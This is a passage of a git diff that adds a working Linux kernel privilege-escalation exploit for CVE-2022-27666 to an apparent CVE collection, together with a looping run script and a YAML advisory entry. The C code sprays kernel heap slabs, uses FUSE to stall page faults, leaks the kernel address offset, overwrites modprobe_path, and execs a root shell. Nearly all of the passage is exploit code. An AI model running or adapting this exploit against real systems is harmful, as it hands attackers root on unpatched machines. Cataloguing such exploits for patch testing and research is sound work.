+ perror("trigger creation failed"); + exit(-1); + } + char root[] = "\xff\xff\xff\xff"; + write(fd, root, sizeof(root)); + close(fd); + chmod(PROC_MODPROBE_TRIGGER, 0777); +} + +void overwrite_modprobe() +{ + void *modprobe_path = addr_modprobe_path + kaslr_offset; + printf("[+] modprobe_path: 0x%llx\n", modprobe_path); + void *fuse_evil_addr; + + for (int i=0; i<50; i++) { + if (fork() != 0) + break; + + void *evil_page = mmap(0x1338000, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); + init_fuse_mem("evil2/evil", &fuse_evil_addr, evil_page+0x1000, 0x1000); + if (fuse_evil_addr != (evil_page+0x1000)) + { + perror("mmap fail fuse 1"); + exit(-1); + } + void *evil_page2 = mmap(fuse_evil_addr+0x1000, 0x10000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); + struct msgbuf_key *evil_msg = fuse_evil_addr-0x8; + + arb_write(modprobe_path-8, strlen(evil_str), evil_msg); + write(fuse_pipes[1], "A", 1); + sleep(1); + modprobe_trigger(); + sleep(1); + if (am_i_root()) { + pthread_mutex_unlock(&shell_lock->mutex); + pause(); + } + printf("[+] 
Not root, try again\n"); + } + pause(); +} + +void loop(void) +{ + struct msghdr msg; + struct iovec iov; + struct sadb_msg *nlh; + struct sadb_ext *ehdr; + + cpu_set_t my_set; + CPU_ZERO(&my_set); + CPU_SET(0, &my_set); + if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { + perror("[-] sched_setaffinity()"); + exit(EXIT_FAILURE); + } + + nlh = malloc(1024); + memset(&iov, 0, sizeof(iov)); + memset(&msg, 0, sizeof(msg)); + memset(nlh, 0, 1024); + + intptr_t res = 0; + + res = syscall(__NR_socket, AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + + res = syscall(__NR_socket, PF_KEY, SOCK_RAW, PF_KEY_V2); + if (res != -1) + r[0] = res; + + nlh->sadb_msg_version = 0x2; + nlh->sadb_msg_type = SADB_ADD; + nlh->sadb_msg_errno = 0x0; + nlh->sadb_msg_satype = SADB_SATYPE_ESP; + nlh->sadb_msg_len = 0xf; + nlh->sadb_msg_reserved = 0; + nlh->sadb_msg_seq = 0; + nlh->sadb_msg_pid = 0; + + + ehdr = (char *)nlh + sizeof(struct sadb_msg); + ehdr->sadb_ext_len = 0x1; + ehdr->sadb_ext_type = SADB_EXT_KEY_ENCRYPT; + + struct sadb_address *sa_addr = (struct sadb_ext *)((char *)ehdr + ehdr->sadb_ext_len * sizeof(uint64_t)); + sa_addr->sadb_address_len = 0x5; + sa_addr->sadb_address_exttype = SADB_EXT_ADDRESS_DST; + sa_addr->sadb_address_proto = 0x0; + sa_addr->sadb_address_prefixlen = 0x0; + sa_addr->sadb_address_reserved = 0x0; + struct sockaddr_in6 *addr = (char *)sa_addr + sizeof(struct sadb_address); + addr->sin6_family = AF_INET6; + addr->sin6_port = htons(0); + addr->sin6_addr = in6addr_loopback; + + struct sadb_sa *sa = (struct sadb_sa *)((char *)sa_addr + sa_addr->sadb_address_len * sizeof(uint64_t)); + sa->sadb_sa_len = 0x2; + sa->sadb_sa_exttype = SADB_EXT_SA; + sa->sadb_sa_spi = 0x0; + sa->sadb_sa_replay = 0x0; + sa->sadb_sa_state = 0x0; + sa->sadb_sa_auth = 0x0; + sa->sadb_sa_encrypt = 0xb; + sa->sadb_sa_flags = 0x0; + + sa_addr = (struct sadb_address *)((char *)sa + sa->sadb_sa_len * sizeof(uint64_t)); + sa_addr->sadb_address_len = 0x5; + sa_addr->sadb_address_exttype = 
SADB_EXT_ADDRESS_SRC; + sa_addr->sadb_address_proto = 0x0; + sa_addr->sadb_address_prefixlen = 0x0; + sa_addr->sadb_address_reserved = 0x0; + addr = (char *)sa_addr + sizeof(struct sadb_address); + addr->sin6_family = AF_INET6; + addr->sin6_port = htons(0); + addr->sin6_addr = in6addr_loopback; + + iov.iov_base = nlh; + iov.iov_len = 0x78; + + msg.msg_name = 3; + msg.msg_namelen = 0; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = 7; + msg.msg_controllen = 0; + msg.msg_flags = 0; + + res = syscall(__NR_sendmsg, r[0], &msg, 0ul); + res = syscall(__NR_socket, AF_INET6, SOCK_RAW, IPPROTO_TCP); + if (res != -1) + r[1] = res; + + addr = (struct sockaddr_in6 *)0x200000c0; + addr->sin6_family = AF_INET6; + addr->sin6_port = htons(0); + addr->sin6_addr = in6addr_loopback; + res = syscall(__NR_connect, r[1], (struct sockaddr *)addr, sizeof(*addr)); + + struct xfrm_userpolicy_info *xpinfo = (void*)0x20000100; + xpinfo->sel.daddr.a4 = htobe32(0); + xpinfo->sel.saddr.a4 = htobe32(0xac1e0001); + xpinfo->sel.dport = htobe16(0); + xpinfo->sel.dport_mask = htobe16(0); + xpinfo->sel.sport = htobe16(0); + xpinfo->sel.sport_mask = htobe16(0); + xpinfo->sel.family = AF_INET6; + xpinfo->sel.prefixlen_d = 0; + xpinfo->sel.prefixlen_s = 0; + xpinfo->sel.proto = IPPROTO_IP; + xpinfo->sel.ifindex = 0; + xpinfo->sel.user = -1; + xpinfo->lft.soft_byte_limit = 0; + xpinfo->lft.hard_byte_limit = 0; + xpinfo->lft.soft_packet_limit = 0; + xpinfo->lft.hard_packet_limit = 0; + xpinfo->lft.soft_add_expires_seconds = 0; + xpinfo->lft.hard_add_expires_seconds = 0; + xpinfo->lft.soft_use_expires_seconds = 0; + xpinfo->lft.hard_use_expires_seconds = 0; + xpinfo->curlft.bytes = 0; + xpinfo->curlft.packets = 0; + xpinfo->curlft.add_time = 0; + xpinfo->curlft.use_time = 0; + xpinfo->priority = 0; + xpinfo->index = 0; + xpinfo->dir = XFRM_POLICY_OUT; + xpinfo->action = XFRM_POLICY_ALLOW; + xpinfo->flags = 0; + xpinfo->share = XFRM_SHARE_ANY; + + struct xfrm_user_tmpl *ut = (struct 
xfrm_user_tmpl *) (xpinfo + 1); + NONFAILING(*(uint8_t*)0x200001a8 = -1); + NONFAILING(*(uint8_t*)0x200001a9 = 1); + NONFAILING(memset((void*)0x200001aa, 0, 13)); + NONFAILING(*(uint8_t*)0x200001b7 = 1); + ut->id.spi = htobe32(0); + ut->id.proto = IPPROTO_ESP; + ut->family = PF_UNSPEC; + ut->saddr.a4 = 0xfc; + ut->reqid = 0; + ut->mode = XFRM_MODE_TRANSPORT; + ut->share = XFRM_SHARE_ANY; + ut->optional = 0; + ut->aalgos = 0; + ut->ealgos = 0; + ut->calgos = 0; + res = syscall(__NR_setsockopt, r[1], SOL_IPV6, IPV6_XFRM_POLICY, xpinfo, sizeof(*xpinfo) + sizeof(*ut)); + + int tty_fd[1024]; + int n_msg; + int msqid_bk[1024]; + + // Consume up kmalloc-4k slab + msg_spray(SLAB_4k_OBJS_PER_SLAB * (1+SLAB_4k_CPU_PARTIAL), MSG_LEN, 1); + msg_spray(SLAB_4k_OBJS_PER_SLAB * (1 + SLAB_4k_CPU_PARTIAL) - 5 , SIZE_OF_USER_KEY_PAYLOAD, 1); + + // consume lower page order's (<=3) freelist + int fill_large = pagealloc_pad(0x1000, 0x1000); + +#ifdef EXPAND_LOWER_ORDER +#define PROC_FORK 10 + // Make sure lower page order (<3) allocatioin and free won't affect + // order 3 (merging from order 2 or split order 3 to fulfill order 2) + initialise_shared(&free_mutex); + pthread_mutex_lock(&free_mutex->mutex); + printf("start filling lower order\n"); + for (int k=0; kdone++; + pthread_mutex_lock(&free_mutex->mutex); + for (int i=0; i<100; i++) { + // free 1 of 2 order 2 blocks, keep the other in order 2 freelist + close(fill_fd[0][i]); + } + free_mutex->done--; + pthread_mutex_unlock(&free_mutex->mutex); + printf("[+] %d free done -> %d\n", k, free_mutex->done); + pause(); + } + } + while (free_mutex->done < PROC_FORK) { + usleep(10000); + } + printf("Released free lock\n"); + pthread_mutex_unlock(&free_mutex->mutex); + while (free_mutex->done > 0) { + usleep(10000); + } + printf("fill lower order done\n"); + close(fill_large); +#endif + + // initialize fuse + init_fuse_mem("evil1/evil", &fuse_mem_addr, NULL, 0x100000); + initialise_shared(&hang_threads); + + pagealloc_pad(0x2000, 0x8000); 
+#ifdef KERNEL_LEAK + if (!leak_kalsr()) + exit(0); +#endif + +#ifdef KERNEL_EXP + overwrite_modprobe(); +#endif + pause(); +} + +static const struct fuse_operations evil_ops1 = { + .getattr = evil_getattr, + .readdir = evil_readdir, + .read = evil_read_pause, +}; + +static const struct fuse_operations evil_ops2 = { + .getattr = evil_getattr, + .readdir = evil_readdir, + .read = evil_read_sleep, +}; + +void unshare_setup(uid_t uid, gid_t gid) +{ + int temp; + char edit[0x100]; + unshare(CLONE_NEWNS|CLONE_NEWUSER); + temp = open("/proc/self/setgroups", O_WRONLY); + write(temp, "deny", strlen("deny")); + close(temp); + temp = open("/proc/self/uid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", uid); + write(temp, edit, strlen(edit)); + close(temp); + temp = open("/proc/self/gid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", gid); + write(temp, edit, strlen(edit)); + close(temp); + return; +} + +char *fargs_evil1[] = {"poc", "evil1", NULL }; +char *fargs_evil2[] = {"poc", "evil2", NULL }; + + +int main(int argc, char *argv[]) +{ + load_symbols(); + initialise_shared(&shell_lock); + pthread_mutex_lock(&shell_lock->mutex); + if (!fork()) + { + pthread_mutex_lock(&shell_lock->mutex); + printf("[+] I AM ROOT!\n"); + execve("/tmp/myshell", NULL, NULL); + } + fargs_evil1[0] = argv[0]; + fargs_evil2[0] = argv[0]; + unshare_setup(getuid(), getgid()); + modprobe_init(); + mkdir(FUSE_MOUNT1, 0777); + mkdir(FUSE_MOUNT2, 0777); + pipe(fuse_pipes); + evil_buffer = malloc(0x10000); + + if (!fork()) + { + fuse_main(sizeof(fargs_evil1)/sizeof(char *) -1 , fargs_evil1, &evil_ops1, NULL); + } + sleep(1); + + if (!fork()) + { + fuse_main(sizeof(fargs_evil2)/sizeof(char *) -1 , fargs_evil2, &evil_ops2, NULL); + } + sleep(1); + + syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul); + do_sandbox_namespace(); + return 0; +} diff --git a/cve/linux-kernel/2022/CVE-2022-27666/run.sh b/cve/linux-kernel/2022/CVE-2022-27666/run.sh new file mode 100755 index 
0000000000000000000000000000000000000000..c30024b141a936a25569310ea7078589ef49d289 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/run.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +cp get_rooot /tmp/ +cp myshell /tmp/ +while true +do + ./poc + ps aux | grep poc | awk '{ print $2 }' | while read line; do kill -9 $line; done || echo "kill poc, rerun again" +done \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml new file mode 100644 index 0000000000000000000000000000000000000000..e9c89f4bcb42a4a4240e6d9a6a6b87285ff43fb8 --- /dev/null +++ b/cve/linux-kernel/2022/yaml/CVE-2022-27666.yaml @@ -0,0 +1,18 @@ +id: CVE-2022-27666 +source: https://github.com/plummm/CVE-2022-27666 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: High + description: | + Linux kernel 5.16.15之前版本存在安全漏洞,该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。 + scope-of-influence: + ~ linux kernel 5.17-rc5 + reference: + - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15 + - https://www.debian.org/security/2022/dsa-5173 + - https://security.netapp.com/advisory/ntap-20220429-0001/ + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-27666 + tags: 缓冲区溢出,权限提升,cve2022 diff --git a/openkylin_list.yaml b/openkylin_list.yaml index df8bb6c267e828d5c80b9b23d3069ec3104a987e..88625aa27226a82b7f7d77b576282b96d815872e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -20,6 +20,7 @@ cve: - CVE-2022-25636 - CVE-2023-0045 - CVE-2022-32250 + - CVE-2022-27666 sudo: - CVE-2021-3156 - CVE-2023-22809